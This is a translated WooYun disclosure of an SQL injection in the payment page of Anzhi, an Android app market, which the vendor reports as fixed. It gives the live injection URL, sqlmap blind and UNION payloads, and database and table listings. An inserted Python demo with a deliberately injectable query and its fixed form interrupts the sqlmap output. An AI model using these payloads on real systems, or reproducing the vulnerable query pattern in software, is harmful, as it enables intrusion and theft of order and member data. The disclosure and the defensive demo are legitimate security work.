
Vulnerability summary

Defect ID: wooyun-2016-0189833

Title: SQL injection in Anzhi's core business (affecting more than 4 million order records)

Vendor: Anzhi (安智网)

Author: 风之传说

Submitted: 2016-03-28 09:27

Fixed: 2016-04-05 09:44

Published: 2016-04-05 09:44

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: fixed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-03-28: details sent to the vendor, awaiting the vendor's response
2016-03-29: vendor confirmed; details visible to the vendor only
2016-04-05: vendor fixed the vulnerability and chose to publish; details are now public

Brief description:

Anzhi (Beijing Litian Wuxian Network Technology Co., Ltd.) was founded in February 2010 and received an investment in the tens of millions from Shanda in June 2011. The Anzhi forum went live in May 2010, and the first version of the Anzhi Market client followed in June, following a forum-first, market-second growth model that it has executed smoothly at every step. As of today, Anzhi has become the best-known Android app download platform in China and the first domestic third-party app market to pass ten million users.
Seeing that so many folks had submitted vulnerabilities, I couldn't resist looking myself. But I noticed there were few SQL injections, so I tried searching for one. Then I topped up 1 yuan and found it.

Detailed description:

SQL injection in Anzhi's core business (affecting more than 4 million order records and all member records).

Proof of vulnerability:

Seeing that so many folks had submitted vulnerabilities, I couldn't resist looking myself. But I noticed there were few SQL injection reports, so I tried searching for one. Then I topped up 1 yuan and found one. It seems one yuan goes a long way.
No login is required to inject.
Straight to the injection point: the pay order page, a string-type injection in a core parameter:
http://pay.anzhi.com/web/recharge-result?orderId=16032722261270000022

[22:35:53] [INFO] GET parameter 'orderId' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'orderId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:
---
Place: GET
Parameter: orderId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: orderId=16032722261270000022' AND 3359=3359 AND 'kwdp'='kwdp
Type: UNION query
Title: MySQL UNION query (NULL) - 23 columns
Payload: orderId=-3609' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x61784e617a424d615077,0x71707a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
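The sqlmap output above shows a string-type injection: the `orderId` value is closed with a quote and the rest of the input becomes SQL. The following added example is not code from the report or from Anzhi; it reproduces the defect pattern against an in-memory SQLite table with constructed sample orders (the `p_pay_order` schema, column names and `lookup_*` helpers are assumptions), shows how the boolean-based blind payload quoted above acts as a true/false oracle against the string-built query, and shows the hardened lookup that binds the parameter and allow-lists the 20-digit order-id shape seen in the report.

```python
"""
Added example (not part of the WooYun report or Anzhi's code): a string-built
order lookup beside its hardened form, plus a regression check for the
boolean-based blind oracle. Sample data and schema are constructed assumptions.
"""
import re
import sqlite3

# Constructed sample orders; the schema is an assumption, not Anzhi's.
_SAMPLE_ORDERS = [
    ("16032722261270000022", "user_a", 1),
    ("16032722261270000023", "user_b", 50),
    ("16032722261270000024", "user_c", 100),
]

# Order ids in the report are 20 decimal digits; that shape is the allow-list.
ORDER_ID_RE = re.compile(r"^[0-9]{20}$")

# The boolean-based blind payload exactly as sqlmap reported it.
BLIND_PAYLOAD = "16032722261270000022' AND 3359=3359 AND 'kwdp'='kwdp"


def make_db():
    """Build an in-memory database holding the constructed sample orders."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE p_pay_order (order_id TEXT, user_id TEXT, amount INTEGER)"
    )
    conn.executemany("INSERT INTO p_pay_order VALUES (?, ?, ?)", _SAMPLE_ORDERS)
    return conn


def lookup_vulnerable(conn, order_id):
    """Defective on purpose: the request parameter is spliced into the SQL text,
    so a quote in orderId terminates the literal and the remainder is parsed
    as SQL. This is the pattern sqlmap detected."""
    sql = (
        "SELECT order_id, user_id, amount FROM p_pay_order "
        "WHERE order_id = '%s'" % order_id
    )
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, order_id):
    """Hardened form: reject anything that is not a bare 20-digit id before the
    database is touched, then bind the value so it can never become syntax."""
    if not ORDER_ID_RE.match(order_id):
        raise ValueError("malformed orderId")
    sql = "SELECT order_id, user_id, amount FROM p_pay_order WHERE order_id = ?"
    return conn.execute(sql, (order_id,)).fetchall()


def has_blind_oracle(conn, lookup):
    """Regression check for a test suite: a lookup is injectable if the true
    variant of the blind payload returns rows and the false variant does not.
    A hardened lookup rejects both, so it reports no oracle."""
    true_variant = BLIND_PAYLOAD
    false_variant = BLIND_PAYLOAD.replace("3359=3359", "3359=3360")
    try:
        return lookup(conn, true_variant) != lookup(conn, false_variant)
    except ValueError:
        return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup, true payload :", lookup_vulnerable(db, BLIND_PAYLOAD))
    print("vulnerable oracle present       :", has_blind_oracle(db, lookup_vulnerable))
    print("hardened oracle present         :", has_blind_oracle(db, lookup_hardened))
```

The differential in `has_blind_oracle` is the same signal sqlmap uses for the "boolean-based blind" technique: one request with a true condition, one with a false condition, and a row-count or page difference between them. Running that check against the real lookup function in CI, with the allow-list and bound parameter in place, keeps the fix from regressing when the query is later edited.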


available databases [17]:
[*] accesslog
[*] adunion
[*] adunion_admin
[*] adunion_stat
[*] anzhipay
[*] anzhipay_history
[*] information_schema
[*] keta_custom
[*] mysql
[*] pay
[*] pay_activities
[*] pay_check_bill
[*] performance_schema
[*] quartz
[*] sdk_message
[*] test
[*] ucenter


The pay database:
Database: pay
[156 tables]
+----------------------------------+
| check_money_20140106 |
| check_money_20140106_pay |
| dim_cp_tax |
| dim_cp_tax_temp2_20130905 |
| dim_cp_tax_temp_20130905 |
| fct_pay_order |
| fct_pay_order2 |
| fct_pay_order_tmp |
| fct_pay_tenpay_order |
| m_activities_user |
| m_activities_user_exist |
| m_app_payment_type |
| m_app_payment_type_20140825 |
| m_app_payment_type_copy |
| m_app_paytypes |
| m_app_paytypes_20140718 |
| m_app_paytypes_20140724 |
| m_p_app_sms_suport |
| m_pay_app_callback |
| m_pay_count_0 |
| m_pay_count_1 |
| m_pay_count_10 |
| m_pay_count_11 |
| m_pay_count_12 |
| m_pay_count_13 |
| m_pay_count_14 |
| m_pay_count_15 |
| m_pay_count_16 |
| m_pay_count_17 |
| m_pay_count_18 |
| m_pay_count_19 |
| m_pay_count_2 |
| m_pay_count_3 |
| m_pay_count_4 |
| m_pay_count_5 |
| m_pay_count_6 |
| m_pay_count_7 |
| m_pay_count_8 |
| m_pay_count_9 |
| m_pay_inf_manage |
| m_pay_paytype |
| m_pay_recharge |
| m_pay_recharge_type___ |
| m_pay_subchannel |
| m_pay_user_limit_quota |
| m_pay_user_limit_quota_back |
| m_rebate_wealth |
| m_rebate_wealth_20141224 |
| m_sms_config |
| m_user_20150317 |
| m_user_reward_wealth |
| m_user_reward_wealth_20141127 |
| m_user_reward_wealth_bak |
| m_user_reward_wealth_his |
| mid_cp_rate |
| mid_month_money |
| mid_order_id |
| mid_p_app_type |
| mid_p_app_type1 |
| mid_p_app_type_bad |
| mid_p_pay_app_month_revenue |
| mid_p_pay_order_hour |
| mid_p_pay_order_hour1 |
| mid_p_pay_settlement |
| mid_pay_order1 |
| mid_pay_order2 |
| p_activities_res |
| p_activities_res_20150225 |
| p_app_category |
| p_app_channel |
| p_app_gametype |
| p_app_inf_rate |
| p_app_info |
| p_app_info_20140616 |
| p_app_info_20151207 |
| p_app_info_day |
| p_app_rate |
| p_app_rate_step |
| p_app_sms |
| p_app_tax |
| p_dev_user_manage |
| p_dev_user_manage_20150625 |
| p_order_ing |
| p_pay_app_month_revenue |
| p_pay_app_month_revenue_20131113 |
| p_pay_app_month_revenue_20140612 |
| p_pay_app_month_revenue_20150624 |
| p_pay_channel_order_rec |
| p_pay_device |
| p_pay_filter_testaccount |
| p_pay_filter_testuser |
| p_pay_inf_manage |
| p_pay_order |
| p_pay_order_1 |
| p_pay_order_15042917391270000002 |
| p_pay_order_2 |
| p_pay_order_201404 |
| p_pay_order_20150415 |
| p_pay_order_3 |
| p_pay_order_4 |
| p_pay_order_5 |
| p_pay_order_6 |
| p_pay_order_7 |
| p_pay_order_8 |
| p_pay_order_9 |
| p_pay_order_history_121229145631 |
| p_pay_order_mid |
| p_pay_order_tmp_0814 |
| p_pay_repeat_tips |
| p_pay_rules |
| p_pay_sdk_update_mgr |
| p_pay_sdk_upgrade_rec |
| p_pay_settlement |
| p_pay_settlement_20131113 |
| p_pay_sms_app |
| p_pay_sms_good |
| p_pay_tenpay_app_month |
| p_pay_tenpay_order |
| p_pay_tenpay_order_count |
| p_pay_tenpay_settlement |
| p_pay_type |
| p_pay_upload_appkey_log |
| p_pay_user_app |
| p_recharge_pro |
| p_recharge_pro_history |
| run_log_err |
| t_activities_1413 |
| t_auth_user |
| t_auth_user_new |
| t_auth_user_new_ |
| t_menu |
| t_menu_20140826 |
| t_menu_new |
| t_operation_permission |
| t_role_menu |
| t_role_menu_new |
| t_role_operation |
| t_roles |
| t_roles_new |
| t_user_roles |
| t_user_roles_new |
| task_list |
| task_list_app_name |
| task_log |
| task_log_20140811 |
| tmp_error_user |
| tmp_order_id |
| tmp_total_m |
| tmp_user_abz |
| tmp_user_consume |
| tmp_user_m2azb |
| tmp_user_pay |
| tmp_user_red |
| tmp_user_status |
| zfb_order |
| zfb_ording |
+----------------------------------+


Then let's check how many orders there are:

[Image: 10.png]


About 4.8 million, nearly 5 million.
A SQL injection report should be short and to the point. Yes, that's all.

Fix recommendation:

SQL injection; you should know how to fix it.

Copyright notice: when reposting, please credit 风之传说@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-03-29 13:55

Vendor reply:

Thanks, we will fix it right away.

Latest status:

2016-04-05: fixed.